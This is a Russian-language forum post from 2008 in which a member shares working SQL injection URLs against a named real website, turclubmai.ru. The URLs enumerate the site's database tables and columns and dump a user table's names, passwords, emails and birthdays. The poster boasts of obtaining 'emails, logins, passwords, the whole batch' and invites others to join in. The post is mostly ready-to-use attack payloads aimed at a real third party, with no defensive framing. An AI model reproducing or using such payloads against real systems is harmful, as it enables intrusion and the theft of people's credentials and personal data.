18.06.2008, 18:33
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257
Репутация:
627
|
|
Вот смог развить инъекцию, налетай))
Код:
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,concat(name,%20char(58),name2,char(58),name3,char(58),passw,char(58),police,char(58),birthday,char(58),email,0x3C62723E)+FROM+author_tbl+limit+0,1000/*
Мыла, логины, пароли, вся пачка.
Вот имена таблиц:
Код:
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,TABLE_NAME+FROM%20INFORMATION_SCHEMA.TABLES+limit+1,30/*
Колонки в author_tbl
Код:
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x617574686F725F74626C+limit+0,20/*
PS Если что не так, не бейте сильно, я изучаю SQLINJ всего лишь четвертый день((
Последний раз редактировалось Лайт; 18.06.2008 в 19:06..
|
|
|